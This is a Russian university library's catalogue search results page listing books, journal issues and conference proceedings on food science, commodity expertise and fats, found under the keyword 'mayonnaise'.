Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

187 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=МАЙОНЕЗ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 21
1. 
Экспертиза масел, жиров и продуктов их переработки. Качество и безопасность [Текст] / Е. П. Корнена [и др.] ; ред. В. М. Позняковский ; дар. О. Д. Худякова, 2007. - 269, [1] с.
Держатели документа (Информация об экземплярах) 

Пособие входит в серию "Экспертиза пищевых продуктов и продовольственного сырья". Содержит наиболее полный учебно-справочный материал по вопросам качества, безопасности и экспертизе масел, жиров и продуктов их переработки.

Представлена следующая информация по рассматриваемой группе пищевых продуктов: основные понятия, классификация, ассортимент и товароведная характеристика, технология производства, экспертиза качества и безопасности (органолептические, физико-химические, микробиологические показатели, дефекты, идентификация), упаковка, маркировка, транспортирование и хранение.

Пособие предназначено для студентов высших учебных заведений, обучающихся по направлениям и специальностям указанного пищевого профиля.

Имеет практическую значимость для работников пищевой и перерабатывающей промышленности, специалистов экспертных (инспекционных, оценочных) организаций, органов по сертификации, испытательных лабораторий, аудиторских и сюрвейерских фирм, занимающихся вопросами качества и безопасности продуктов питания.

2. 
Гранаткина, Наталья Викторовна. Товароведение и организация торговли продовольственными товарами [Текст] / Н. В. Гранаткина, 2012. - 248, [1] с.
Держатели документа (Информация об экземплярах) 

Изложены теоретические основы товароведения, приведены классификация и характеристика продовольственных товаров. Рассмотрены показатели качества, дефекты и сроки хранения товаров, организация торговли и основные виды торгового оборудования.

В 5-е издание внесены изменения, связанные с введением в действие новых нормативных документов на продовольственные товары по состоянию на 1 августа 2011 г.

Учебное пособие может быть использовано при освоении профессионального модуля ПМ.02 "Продажа продовольственных товаров" (МДК.02.01) по профессии 100701.01 "Продавец, контролер-кассмр".

Для ускоренной подготовки продавцов продовольственных товаров. Может быть использовано при других формах обучения.

3. 
Идентификационная и товарная экспертиза продуктов белкового питания и пищевых жиров [Текст] / Т. Г. Родина [и др.] ; ред. Т. Г. Родина, 2013. - 543, [1] с.
Держатели документа (Информация об экземплярах) 

Состояние продовольственного рынка на современном этапе, в частности насыщение его фальсифицированными и контрафактными товарами, обусловливает необходимость развития методов идентификационной экспертизы.

В учебнике рассмотрены актуальные вопросы идентификационной и товарной экспертизы продуктов; назначение и правовые основы идентификации, виды товарной экспертизы. Основное внимание уделяется ассортиментной и категорийной идентификации товаров, позволяющей выявить признаки фальсификации. В целях гармонизации отечественных и зарубежных подходов к экспертизе качества приводятся сведения о некоторых международных стандартах ФАО/ВОЗ по группе рыбных товаров и морепродуктов.

Для специалистов, бакалавров и магистров, а также для аспирантов, научных работников и специалистов, работающих в области товароведения, товарного менеджмента, маркетинга, технологии, стандартизации и сертификации товаров.

4. 
Идентификационная и товарная экспертиза продуктов белкового питания и пищевых жиров [Текст] / Т. Г. Родина [и др.] ; ред. Т. Г. Родина, 2011. - 543, [1] с.
Держатели документа (Информация об экземплярах) 

Состояние продовольственного рынка на современном этапе, в частности насыщение его фальсифицированными и контрафактными товарами, обусловливает необходимость развития методов идентификационной экспертизы.

В учебнике рассмотрены актуальные вопросы идентификационной и товарной экспертизы продуктов; назначение и правовые основы идентификации, виды товарной экспертизы. Основное внимание уделяется ассортиментной и категорийной идентификации товаров, позволяющей выявить признаки фальсификации. В целях гармонизации отечественных и зарубежных подходов к экспертизе качества приводятся сведения о некоторых международных стандартах ФАО/ВОЗ по группе рыбных товаров и морепродуктов.

Для специалистов, бакалавров и магистров, а также для аспирантов, научных работников и специалистов, работающих в области товароведения, товарного менеджмента, маркетинга, технологии, стандартизации и сертификации товаров.

5. 
Арет В. А. Физико-механические свойства сырья и готовой продукции [Текст] / В. А. Арет, Б. Л. Николаев, Л. К. Николаев ; дар. В. В. Арсеньев, 2009. - 442, [1] с.
Держатели документа (Информация об экземплярах) 

В учебном пособии широко освещены и теоретические, и экспериментальные составляющие курса. Изложены основы инженерной реологии и ее применения в расчетах оборудования жиолслдержащих пищевых продуктов. Приведены выводы расчетных зависимостей, что облегчает понимание физической и математической сущности рассматриваемых вопросов. Достаточно полно представлены экспериментальные данные реометрии мноших жиросодержащих продуктов при их различных фазовых состояниях: застывшем состоянии, в стадии плавления и в расплавленном виде. Экспериментальные данные приводятся в широком интервале градиента скорости и касательного напряжения, что возволяет использовать их для расчета различного оборудования.

6. 
Питание и общество. - Журнал, 2007г. № 3
Оглавление 
  • Кучер, Л. Банкеты / Л. Кучер, Л. Шкуратова. - с.12-13
  • Троицкая, Е. Проектируем Интернет-кафе / Е. Троицкая, Т. Новикова. - с.20-21
    Кл. слова: ИНТЕРНЕТ - Кафе
  • Кацерикова, Н. Диетический майонез / Н. Кацерикова, Р. Казаков. - с.21
  • Филонов, М. Похож на наконечник копья / М. Филонов. - с.30-31
    Кл. слова: ЩАВЕЛЬ - ПИТАНИЕ
7. 
Пищевая промышленность. - Журнал, 2009г. № 9
Оглавление 
  • Панфилов, В. А. Разработка образа пищевого предприятия XXI века - необходимое условие систематического развития технологий и техники / В. А. Панфилов. - с.8-10
    Кл. слова: ПРЕДПРИЯТИЕ ПИЩЕВОЕ
  • Акулич, А. В. Сушка плодоовощного сырья с использованием ИК-излучения / А. В. Акулич, А. В. Темрук. - с.12-13
    Кл. слова: СУШКА инфракрасная, СЫРЬЕ плодоовощное, СУШИЛКА комбинированная
  • Тукачев, В. Е. Устройства нового поколения для резки и сушки макаронных изделий / В. Е. Тукачев, М. В. Калачев, Ю. В. Зуева. - с.14-16
    Кл. слова: РЕЗКА макаронных изделий, СУШКА МАКАРОННЫХ ИЗДЕЛИЙ
  • Шуляк, В. А. Обжарочные аппараты малой производительности / В. А. Шуляк, А. В. Булгак. - с.18-21
    Кл. слова: АППАРАТ обжарочный
  • Шкоп, Я. Я. Технология КНП-фриго для производства функциональной пищи / Я. Я. Шкоп. - с.22-23
    Кл. слова: КОНЦЕНТРАТ натуральных продуктов
  • Влияние нанотехнологических добавок морского генеза на свойства эмульсионных продуктов. - с.30-32
    Кл. слова: МАЙОНЕЗ, ПОЛИСАХАРИДЫ, ЭМУЛЬГАТОР
  • Бердутина, А. В. Методика определения эмульсионных свойств белковых препаратов / А. В. Бердутина, А. С. Громов. - с.35-37
    Кл. слова: ПРЕПАРАТ белковый
  • Феофилактова, О. В. Разработка соусов с применением эубиотических микроорганизмов и их метаболитов / О. В. Феофилактова, А. В. Казаков. - с.38-39
    Кл. слова: СОУСЫ
  • Матисон, В. А. Улучшение качества системы управления персоналом / В. А. Матисон. - с.48-49
    Кл. слова: УПРАВЛЕНИЕ ПЕРСОНАЛОМ
  • Арутюнова, Н. И. Формирование концепции нового продукта питания на основе оценки требований потребителей / Н. И. Арутюнова, В. А. Матисон. - с.50-51
    Кл. слова: ПРОДУКТЫ ПИТАНИЯ
  • Шанин, А. А. Современные высокоэффективные моющие и дезинфицирующие средства для пищевой промышленности / А. А. Шанин, Ю. А. Корнев. - с.52-53
    Кл. слова: СРЕДСТВА МОЮЩИЕ, СРЕДСТВА дезинфицирующие
  • Хасанова, С. Д. Продление сроков хранения помадных конфет / С. Д. Хасанова, З. Г. Скобельская. - с.54-55
    Кл. слова: КОНФЕТЫ, СРОК ХРАНЕНИЯ ПРОДУКТОВ
  • Евдокимова, О. В. Товарные свойства культивируемого женьшеня / О. В. Евдокимова. - с.56-57
    Кл. слова: женьшень
  • Как улучшить качество сметанного продукта?. - с.58-60
    Кл. слова: СМЕТАНА, КАЧЕСТВО ПРОДУКЦИИ
  • Экстракт фукуса для производства продуктов, обогащенных йодом. - с.61
    Кл. слова: фукус, ЙОД - ПИТАНИЕ
  • Жадан, П. В икре самое "лакомое" - антибиотики? / П. Жадан. - с.63
    Кл. слова: ИКРА
  • Бакуменко, О. Е. Принципы разработки функциональных продуктов для студентов / О. Е. Бакуменко, Т. В. Иванникова, Ю. О. Натокина. - с.64-65
    Кл. слова: ПИТАНИЕ СТУДЕНТОВ
  • Роль функционального питания в коррекции йоддефицитных состояний. - с.66-68
    Кл. слова: ПИТАНИЕ ФУНКЦИОНАЛЬНОЕ, ПРОДУКТЫ йодированные
8. 
Современная торговля. - Журнал, 2012г. № 9
Оглавление 
  • Майонез Calve - абсолютный лидер рынка. - с.8-9
  • Кассиры больше не нужны!. - с.10-12
  • Что будет, если пластик для алкоголя запретят?. - с.13-15
  • Перспективные "немиллионники". - с.16-18
  • Збруева, О. Рост продолжается / О. Збруева. - с.19-21
  • Баранов, С. Рынок вендинга: состояние и перспективы / С. Баранов. - с.31-37
  • Аптечный ритейл: рецепт здоровья. - с.38-43
  • Страховые инновации. - с.49-51
  • Директор магазина в новых форматах. - с.58-61
  • Львова, В. Тестирование сети магазинов художественных товаров "Передвижник" / В. Львова. - с.62-66
  • Мягчева, М. Тестирование интерен-магазина "Дикая Орхидея" / М. Мягчева. - с.67-69
9. 
Изобретатель и рационализатор. - Журнал, 2005г. № 9
Оглавление 
  • [Новые патенты]. - с.2-3
  • Рогов, Е. Нам заказывают то, что не купишь / Е. Рогов. - с.4-5
  • Маслаев, В. Хватит обматывать тряпкой / В. Маслаев. - с.5-6
  • Новожилов, Ю. "Вечное движение" двигается дальше / Ю. Новожилов. - с.6-7
  • Сердюков, О. Запряжем притяжение Земли / О. Сердюков. - с.8-9
  • Можайский, М. Теперь не заржавеет / М. Можайский. - с.9
  • Можайский, М. Конкуренты Калашникова / М. Можайский. - с.10
  • Шкроб, Ю. Куда девать макулатуру / Ю. Шкроб. - с.10-11
  • Шкроб, Ю. Вигвам в стиле хай-тек / Ю. Шкроб. - с.11
  • Рогов, Е. Памперс для ДВС / Е. Рогов. - с.11
  • Михайлов, М. Вместо пресса примите ванну / М. Михайлов. - с.12
  • Сердюков, О. "Порционная" жатка / О. Сердюков. - с.12
  • Рогов, Е. Под тяжестью плодов только гнется / Е. Рогов. - с.13
  • Шкроб, Ю. Сам себе массажист / Ю. Шкроб. - с.13
  • Суворов, С. Магнит укрепит мужчин / С. Суворов. - с.13-14
  • Можайский, М. Молодые начинают с сапропеля / М. Можайский. - с.14
  • Медведев, Юлий. И вырисуются поля будущих концессий / Ю. Медведев. - с.15
  • Горбунов, О. Повезло тверянам / О. Горбунов. - с.16
  • Ренкель, А. Майонез рожден при осаде Маона / А. Ренкель. - с.19
  • Никишин, С. Гибрид очистит воздух / С. Никишин. - с.20-21
  • [Новые патенты]. - с.21
  • Ренкель, А. Эмали горшечника Палисси / А. Ренкель. - с.22-23
  • Ефимочкин, А. Международный конкурс изобретений / А. Ефимочкин. - с.23
  • [Новые патенты]. - с.24
  • Ренкель, А. Памятник изобретателю / А. Ренкель. - с.25
  • Гаврилов, Марк. Кто придумал хлеб? / М. Гаврилов. - с.28-29
  • Рогов, Е. Дело за внедрением / Е. Рогов. - с.26-27
  • Гаврилов, Марк. Детский череп Моцарта / М. Гаврилов. - с.32
  • Ренкель, А. [Консультации патентоведа] / А. Ренкель. - с.30
  • Кукушкин, А. [Консультации юриста] / А. Кукушкин. - с.31
  • Плужников, Владимир. Когда-то в сентябре / В. Плужников
Держатели документа (Информация об экземплярах) 
10. 
Кулинарные рецепты: Из "Книги о вкусной и здоровой пище" [Текст] / сост. Л. И. Воробьева ; дар.: Л. К. Жарина, Л. К. Жарина, 1988. - 334, [1] с.
Ключевые слова 
ЗАКУСКА -- БУТЕРБРОД -- САЛАТ -- ИКРА -- ПАШТЕТ -- СОУС -- МАЙОНЕЗ -- БУЛЬОН -- СУП -- ОКРОШКА -- МЯСО -- КОТЛЕТА -- ТЕФТЕЛИ -- ШНИЦЕЛЬ -- ПЕЛЬМЕНИ -- КУРИЦА -- ДИЧЬ -- РЫБА -- МОРЕПРОДУКТ -- ТВОРОЖНИКИ -- ВАРЕНИК -- БЛИНЧИКИ -- ЗАПЕКАНКА -- ПУДИНГ -- ОМЛЕТ -- ОВОЩИ -- ГРИБЫ -- КАРТОФЕЛЬ -- ФОРШМАК -- КАША -- ПЛОВ -- КЛЕЦКИ -- ЧЕБУРЕК -- КУКУРУЗА -- ФАСОЛЬ -- ГОРОХ -- ЧЕЧЕВИЦА -- ПИРОЖОК -- ВАТРУШКА -- БУЛКА -- ОЛАДЬИ -- РУЛЕТ -- ПИРОЖНОЕ -- ТОРТ -- КЕКС -- ПОНЧИК -- ХВОРОСТ -- КИСЕЛЬ -- КОМПОТ -- ЖЕЛЕ -- МУСС -- КРЕМ -- ПУДИНГ -- ШАРЛОТКА -- МАРИНАД -- СОЛЕНЬЕ -- МАРИНАД -- КОНСЕРВИРОВАНИЕ -- ЗАМОРАЖИВАНИЕ -- ЯГОДЫ
Держатели документа (Информация об экземплярах) 
11. 
Наука XXI века: тенденции и перспективы [Текст] / ред. А. И. Барановский, 2015. - 198 с.
Оглавление 
  • Блинов, О. А. Опыт развития агротуристической деятельности в районах Омской области / О. А. Блинов, Д. С. Нардин, С. А. Нардина. - с.3-7
    Кл. слова: ОМСКАЯ ОБЛАСТЬ - ТУРИЗМ, АГРОТУРИЗМ
  • Блинов, О. А. Организация финансового менеджмента на предприятиях агропромышленного комплекса / О. А. Блинов, А. В. Гаврилова. - с.7-12
    Кл. слова: МЕНЕДЖМЕНТ ФИНАНСОВЫЙ, КОМПЛЕКС АГРОПРОМЫШЛЕННЫЙ
  • Боровских, Н. В. Структура и особенности функционирования рынка молока / Н. В. Боровских, С. В. Боровских. - с.12-16
    Кл. слова: РЫНОК МОЛОКА, МОЛОКО - СПРОС, МОЛОКО - ПРЕДЛОЖЕНИЕ
  • Герасимова, Н. О. Особенности развития продовольственного рынка как элемента современной экономической системы / Н. О. Герасимова, Л. А. Кочемайкина. - с.17-
    Кл. слова: СИСТЕМА ЭКОНОМИЧЕСКАЯ, РЫНОК ПРОДОВОЛЬСТВЕННЫЙ, РЕГУЛИРОВАНИЕ ПРОДОВОЛЬСТВЕННОГО РЫНКА
  • Глебова, Н. М. Определение конкурентных преимуществ вуза с учетом предпочтений потребителей / Н. М. Глебова, Е. Е. Грязнова. - с.21-27
    Кл. слова: УСЛУГА ОБРАЗОВАТЕЛЬНАЯ, КОММУНИКАЦИИ МАРКЕТИНГОВЫЕ, ВУЗ - КОНКУРЕНЦИЯ
  • Губанова, Е. В. Исследование регионального рынка труда на примере Калужской области / Е. В. Губанова. - с.28-34
    Кл. слова: РЫНОК ТРУДА РЕГИОНАЛЬНЫЙ, БЕЗРАБОТИЦА, КАЛУЖСКАЯ ОБЛАСТЬ
  • Ермакова, Н. С. К вопросу о нематериальном стимулировании персонала / Н. С. Ермакова, О. А. Якуб, Е. А. Обвинцева. - с.34-42
    Кл. слова: СТИМУЛИРОВАНИЕ ПЕРСОНАЛА, СТИМУЛИРОВАНИЕ НЕМАТЕРИАЛЬНОЕ, ПЕРСОНАЛ
  • Иванова, Н. Г. Повышение активности контрольных мероприятий по учету расчетов с персоналом по оплате труда в бюджетных организациях / Н. Г. Иванова, С. А. Мороз, Т. А. Головина. - с.42-48
    Кл. слова: ОПЛАТА ТРУДА - БЮДЖЕТНАЯ СФЕРА, АУТСОРСИНГ, КО-СОРСИНГ
  • Иккерт, А. В. Совершенствование учета основных средств на примере ЗАО "Первомайское" Омского района Омской области / А. В. Иккерт, Ю. И. Новиков. - с.50-53
    Кл. слова: СРЕДСТВА ОСНОВНЫЕ, ЗАО ПЕРВОМАЙСКОЕ, ФОНД ОСНОВНОЙ
  • Казначеева, Е. М. Система штрафов и доплат как элемент воздействия на результаты работы персонала организации / Е. М. Казначеева. - с.186-192
    Кл. слова: ПЕРСОНАЛ ОРГАНИЗАЦИИ, САНКЦИИ ШТРАФНЫЕ, ДОПЛАТА
  • Кислицын, В. Г. Учет загрузки производственных мощностей как способ снизить роль неявных факторов в статистическом анализе источников / В. Г. Кислицын. - с.57-63
    Кл. слова: МОЩНОСТЬ ПРОИЗВОДСТВЕННАЯ, АНАЛИЗ СТАТИСТИЧЕСКИЙ, УЧЕТ ПРОИЗВОДСТВЕННЫХ МОЩНОСТЕЙ
  • Кислицына, Т. Ф. Электронный документооборот - высокотехнологичный и прогрессивный подход к существенному повышению эффективности работы организации / Т. Ф. Кислицына, Л. В. Лукашевич. - с.64-73
    Кл. слова: ДОКУМЕНТООБОРОТ ЭЛЕКТРОННЫЙ, ПРОДУКТ ПРОГРАММНЫЙ, ЭФФЕКТИВНОСТЬ ПРОИЗВОДСТВА
  • Лалова, Е. Ю. Человеческий капитал и производительность труда работников как объект управления персоналом / Е. Ю. Лалова, Л. Н. Иванова. - с.73-78
    Кл. слова: КАПИТАЛ ЧЕЛОВЕЧЕСКИЙ, ПРОИЗВОДИТЕЛЬНОСТЬ ТРУДА, УПРАВЛЕНИЕ ПЕРСОНАЛОМ
  • Литвякова, Ю. С. Организация аудиторской проверки основных средств на примере ООО "Солярное" Черлакского района Омской области / Ю. С. Литвякова. - с.78-82
    Кл. слова: ПРОВЕРКА АУДИТОРСКАЯ, СРЕДСТВА ОСНОВНЫЕ
  • Литвякова, Ю. С. Организация бухгалтерского учета основных средств на примере ООО "Солярное" Черлакского района Омской области / Ю. С. Литвякова. - с.78-82
    Кл. слова: УЧЕТ БУХГАЛТЕРСКИЙ, СРЕДСТВА ОСНОВНЫЕ
  • Мамонтов, С. А. Обобщенные результаты исследования потребительского рынка города Омска / С. А. Мамонтов, Ю. В. Шляпина
    Кл. слова: РЫНОК ПОТРЕБИТЕЛЬСКИЙ, ИССЛЕДОВАНИЕ МАРКЕТИНГОВОЕ, ОМСК - ТОРГОВЛЯ
  • Маслова, Л. И. О некоторых аспектах экономических отношений в сфере высшего профессионального образования Кыргызстана / Л. И. Маслова. - с.98-102
    Кл. слова: КЫРГЫЗСТАН - ОБРАЗОВАНИЕ
  • Новиков, Ю. И. Повышение конкурентоспособности зернового производства в системе обеспечения продовольственной безопасности / Ю. И. Новиков. - с.102-105
    Кл. слова: БЕЗОПАСНОСТЬ ПРОДОВОЛЬСТВЕННАЯ, ПРОИЗВОДСТВО ЗЕРНОВОЕ
  • Новиков, Ю. И. Учет кредитов и займов в ТОО "Совет-СК", Республика Казахстан / Ю. И. Новиков, В. А. Штрикер. - с.106-109
    Кл. слова: ФОНДОЕМКОСТЬ, ЗАЙМ, КРЕДИТ
  • Рожина, Е. Ю. Современные концепции оценки социально-экономической эффективности деятельности рыночных субъектов / Е. Ю. Рожина, Т. Б. Дороболюк, С. И. Ускова. - с.110-119
  • Турдалы, Н. О. Актуальные вопросы конкурентоспособности регионов Республики Казахстан / Н. О. Турдалы, А. Н. Турдалы, Ж. Н. Турдалы. - с.119-132
    Кл. слова: КАЗАХСТАН - РЕГИОНЫ, КАЗАХСТАН - ЭКОНОМИКА
  • Турдалы, Н. О. Инфраструктура поддержки малого предпринимательства в Республике Казахстан / Н. О. Турдалы, А. Е. Шахарова. - с.132-144
    Кл. слова: КАЗАХСТАН - ПРЕДПРИНИМАТЕЛЬСТВО
  • Чуракова, Т. Б. Анализ и перспективы развития потребительского рынка города Омска в 2015 году / Т. Б. Чуракова, В. А. Пинко. - с.145-150
    Кл. слова: РЫНОК ПОТРЕБИТЕЛЬСКИЙ, ОМСК - БИЗНЕС
  • Шагланов, А. Н. Инвестиционный климат в России: проблемы и перспективы / А. Н. Шагланов. - с.150-155
    Кл. слова: ИНВЕСТИЦИИ - РОССИЯ, ДЕЯТЕЛЬНОСТЬ ИНВЕСТИЦИОННАЯ
  • Шеремета, С. В. Процесс управления активами кредитной организации / С. В. Шеремета, И. Н. Шадрина. - с.155-160
    Кл. слова: ОРГАНИЗАЦИЯ КРЕДИТНАЯ, АКТИВ БАНКА, УПРАВЛЕНИЕ АКТИВАМИ
  • Эрлих, А. Е. Особенности взаимодействия предприятий общественного питания / А. Е. Эрлих, Н. В. Бобкова, Е. Н. Клок. - с.160-164
    Кл. слова: ПИТАНИЕ ОБЩЕСТВЕННОЕ, ВЗАИМОДЕЙСТВИЕ ПРЕДПРИЯТИЙ
  • Беспалова, Т. А. Современные методы дезинфекции при казеозном лимфадените / Т. А. Беспалова, О. А. Приступа, А. В. Шадрин. - с.165-170
    Кл. слова: ДЕЗИНФЕКЦИЯ, ЛИМФАДЕНИТ, ЗАБОЛЕВАНИЕ ИНФЕКЦИОННОЕ
  • Бураковская, Н. В. Инновационные технологии в организации школьного питания / Н. В. Бураковская. - с.170-172
    Кл. слова: ПИТАНИЕ ШКОЛЬНИКОВ, РАЦИОН СБАЛАНСИРОВАННЫЙ, ТЕХНОЛОГИИ ИННОВАЦИОННЫЕ
  • Германская, Л. Г. Молокосодержащие продукты как системообразующий фактор здорового питания / Л. Г. Германская, Н. А. Бенгардт, Л. М. Завгородняя. - с.172-175
    Кл. слова: ПРОДУКТЫ МОЛОКОСОДЕРЖАЩИЕ, ПИТАНИЕ ЗДОРОВОЕ
  • Есипова, М. С. Инновационные технологии в производстве творожных продуктов / М. С. Есипова, М. О. Индычий. - с.176-181
    Кл. слова: ТВОРОГ, ПРОДУКТ ТВОРОЖНЫЙ, ТЕХНОЛОГИИ ИННОВАЦИОННЫЕ
  • Каня, И. П. Салатные застолья / И. П. Каня. - с.181-188
    Кл. слова: САЛАТЫ, СОВМЕСТИМОСТЬ ПРОДУКТОВ, МАЙОНЕЗ
  • Лемешева, Е. Р. Анализ пищевой ценности овощной запеканки с творогом для организации питания детей школьного возраста / Е. Р. Лемешева. - с.188-193
    Кл. слова: ЗАПЕКАНКА ОВОЩНАЯ, ПИТАНИЕ ШКОЛЬНИКОВ, ТВОРОГ
  • Шадрин, М. А. Культура потребления пищевых продуктов / М. А. Шадрин [и др.]
    Другие авторы: Тарасов Р. М., Жданеева Н. П., Галкина С. Л.
    Кл. слова: КУЛЬТУРА ПИТАНИЯ
Держатели документа (Информация об экземплярах) 
12. 
Чепурной И. П. Идентификация и фальсификация продовольственных товаров [Текст] : учеб. / И. П. Чепурной , 2007. - 459 с.
Держатели документа (Информация об экземплярах) 
13. 
Товароведение и экспертиза потребительских товаров [Текст] : Учебник для студентов торговых вузов / рук. авт. кол. В.В. Шевченко, 2003. - 544 с.
Ключевые слова 
товароведение -- экспертиза товаров -- ЗЕРНОМУЧНЫЕ ТОВАРЫ -- КОНДИТЕРСКИЕ ТОВАРЫ -- МОЛОЧНЫЕ ТОВАРЫ -- ПИЩЕВЫЕ ЖИРЫ -- МЯСНЫЕ ТОВАРЫ -- РЫБНЫЕ ТОВАРЫ -- ТОВАРОВЕДЕНИЕ -- КОНСЕРВИРОВАНИЕ -- ТАРА -- УПАКОВКА -- КРУПА -- МУКИ -- ХЛЕБ -- ХЛЕБОБУЛОЧНЫЕ ИЗДЕЛИЯ -- МАКАРОННЫЕ ИЗДЕЛИЯ -- ТОВАРОВЕДЕНИЕ ПЛОДОВ И ОВОЩЕЙ -- ГРИБЫ -- ЧАЙ -- КОФЕ -- НАПИТКИ БЕЗАЛКОГОЛЬНЫЕ -- НАПИТКИ АЛКОГОЛЬНЫЕ -- ТАБАЧНАЯ ПРОДУКЦИЯ -- ПРЯНОСТИ -- ПРИПРАВЫ -- МЕД -- ТОВАРОВЕДЕНИЕ КОНДИТЕРСКИХ ТОВАРОВ -- ТОВАРОВЕДЕНИЕ МОЛОЧНЫХ ТОВАРОВ -- СЫР -- МОРОЖЕНОЕ -- МАЙОНЕЗ -- МЯСНЫЕ КОНСЕРВЫ -- ПОЛУФАБРИКАТЫ -- ЯЙЦА -- ИКРА
Держатели документа (Информация об экземплярах) 
14. 
Чепурной, И. П. Идентификация и фальсификация продовольственных товаров [Текст] : учебник / И. П. Чепурной, 2002. - 460 с.
Держатели документа (Информация об экземплярах) 
15. 
Товароведение и экспертиза пищевых жиров, молока и молочных продуктов [Текст] : Учебник гриф-УМО / под ред. М. С. Касторных, 2003. - 288 с.
Держатели документа (Информация об экземплярах) 
16. 
Социально-экономические и правовые проблемы развития информационного общества [Текст] : материалы междунар. научно-практ. конф., 30 сент. 2009 г. В 5 т. Т. 5. Проблемы экологии и развития индустрии питания в современном обществе / М-во образования Омской обл., Администрация г. Омска, Региональное объединение работодателей Омской обл., Карагандинский ун-т "Болашак" (Республика Казахстан), Бишкекская финансово-экон. акад. (Кыргызская Республика), Сиб. ин-т бизнеса, управления и психологии, г. Красноярск, Омский экон. ин-т, 2009. - 150 с.
Ключевые слова 
Оглавление 
  • Беспалова, Т. А. Влияние биологически активных веществ на иммунный статус норок при алеутской болезни и иммуннодефицитных состояниях / Т. А. Беспалова, Е. А. Хитрова, О. А. Приступа. - с.7-15
    Кл. слова: ДОБАВКА БИОЛОГИЧЕСКИ АКТИВНАЯ, БОЛЕЗНЬ алеутская, ИММУНИТЕТ
  • Богачева, А. А. Здоровое питание подростков в условиях Крайнего Севера / А. А. Богачева, А. И. Турова. - с.15-18
    Кл. слова: ПИТАНИЕ ПОДРОСТКОВ, ПИТАНИЕ ЗДОРОВОЕ
  • Бураковская, Н. В. Актуальные вопросы производства плавленых сырков / Н. В. Бураковская. - с.18-21
    Кл. слова: СЫР ПЛАВЛЕНЫЙ, ПРОИЗВОДСТВО сыра
  • Вальтер, Г. Ф. Технология приготовления творога на основе подсгущеного молока / Г. Ф. Вальтер, П. А. Лисин. - с.21-23
    Кл. слова: ТВОРОГ, ДЕСЕРТ творожный, ПРОИЗВОДСТВО творога
  • Германская, Л. Г. Товароведческая оценка сырного продукта / Л. Г. Германская. - с.23-27
    Кл. слова: СЫР, КАЧЕСТВО сыра
  • Гришина, Е. С. Разработка и оптимизация рецептуры кисломолочного продукта с растительным наполнителем / Е. С. Гришина. - с.27-32
    Кл. слова: ПРОДУКТ КИСЛОМОЛОЧНЫЙ, НАПОЛНИТЕЛЬ растительный
  • Должанкин, В. С. Выбор способов очистки отработанных нефтепродуктов, применяемых в дорожно-строительной технике / В. С. Должанкин. - с.33-41
    Кл. слова: НЕФТЕПРОДУКТЫ, СЫРЬЕ ВТОРИЧНОЕ
  • Жигалкина, Т. С. Проблемы школьного питания учащихся / Т. С. Жигалкина. - с.42-46
    Кл. слова: ПИТАНИЕ ШКОЛЬНИКОВ
  • Жидкова, О. Н. Пищевые волокна в производстве молочных продуктов / О. Н. Жидкова. - с.46-50
    Кл. слова: ВОЛОКНО ПИЩЕВОЕ, ПРОИЗВОДСТВО МОЛОЧНОЕ
  • Завгородняя, Л. М. Йодированные молочные белки / Л. М. Завгородняя. - с.51-62
    Кл. слова: БЕЛОК - ПИТАНИЕ, ПРОДУКТЫ ЙОДИРОВАННЫЕ, ЙОД - ПИТАНИЕ
  • Изосимова, И. В. Влияние выжимок ягод на гидролитические изменения в мясорастительных паштетах / И. В. Изосимова, О. М. Сергачева, А. М. Тимофеева. - с.62-65
    Кл. слова: ПАШТЕТ, ВЫЖИМКА ягодная
  • Каня, И. П. Некоторые сведения о «Herbalife» / И. П. Каня. - с.65-70
    Кл. слова: Herbalife
  • Кащеева, Н. Л. Перспективы использования белково-углеродного сырья в производстве функциональных продуктов / Н. Л. Кащеева. - с.71--72
    Кл. слова: СЫРЬЕ белково-углеводное, ПРОИЗВОДСТВО МОЛОЧНОЕ
  • Королев, А. Н. Качество растениеводческой продукции в условиях техногенного дисбаланса химического состава почвы / А. Н. Королев. - с.73-78
    Кл. слова: БИОХИМИЯ
  • Королев, А. Н. Прогнозирование использования осадков сточных вод в растениеводческих хозяйствах с целью получения экологически безопасных продуктов / А. Н. Королев. - с.78-83
    Кл. слова: ПОЧВА - ЭКОЛОГИЯ, ПРОДУКТЫ ЭКОЛОГИЧЕСКИ ЧИСТЫЕ
  • Лапшинская, Н. А. Влияние молочной сыворотки на качество и безопасность низкокалорийных майонезов / Н. А. Лапшинская, Н. А. Драгун, М. М. Щукина. - с.83-89
    Кл. слова: СЫВОРОТКА молочная, МАЙОНЕЗ
  • Макарова, О. В. Разработка и исследование молочно-растительных систем / О. В. Макарова, О. В. Пасько. - с.89-92
    Кл. слова: ПРОДУКТЫ МОЛОЧНЫЕ, ИССЛЕДОВАНИЕ молочно-растительных систем
  • Мартемьянова, Л. Е. Термодинамический индекс термостабильности пищевых продуктов / Л. Е. Мартемьянова, П. А. Лисин. - с.92-96
    Кл. слова: ИНДЕКС термодинамический, ТЕРМОСТАБИЛЬНОСТЬ пищевых продуктов
  • Мартемьянова, Л. Е. Оценка активности воды пищевых продуктов / Л. Е. Мартемьянова, Г. Ф. Вальтер, П. А. Лисин. - с.97-101
    Кл. слова: ВОДА - ПИТАНИЕ
  • Маюрникова, Л. А. Формирование рынка продуктов специального назначения / Л. А. Маюрникова, Е. В. Санжаровский, Н. В. Горникова. - с.101-105
    Кл. слова: ПРОДУКТЫ специального назначения, КУЛЬТУРА ПИТАНИЯ
  • Миллер, М. А. Индустрия питания и здоровье населения в современных условиях / М. А. Миллер. - с.105-110
    Кл. слова: ИНДУСТРИЯ ПИТАНИЯ, ПИТАНИЕ - ЗДОРОВЬЕ
  • Молибога, Е. А. Безопасность продовольственного сырья и пищевых продуктов как одна из основных составляющих их качества / Е. А. Молибога. - с.111-114
    Кл. слова: БЕЗОПАСНОСТЬ ПРОДОВОЛЬСТВЕННАЯ
  • Неверов, Е. Н. Применение упаковки при охлаждении диоксидом углерода птицы / Е. Н. Неверов. - с.114-117
    Кл. слова: МЯСО охлажденное, ОХЛАЖДЕНИЕ
  • Никишина, И. Н. Возможности создания сегмента молочных продуктов из козьего молока в индустрии питания России / И. Н. Никишина, С. В. Симоненко, С. Е. Димитриева. - с.117-121
    Кл. слова: МОЛОКО козье
  • Петрова, Л. В. О безопасности и качестве сухого молока в процессе распылительной сушки / Л. В. Петрова, С. В. Петрова. - с.122-123
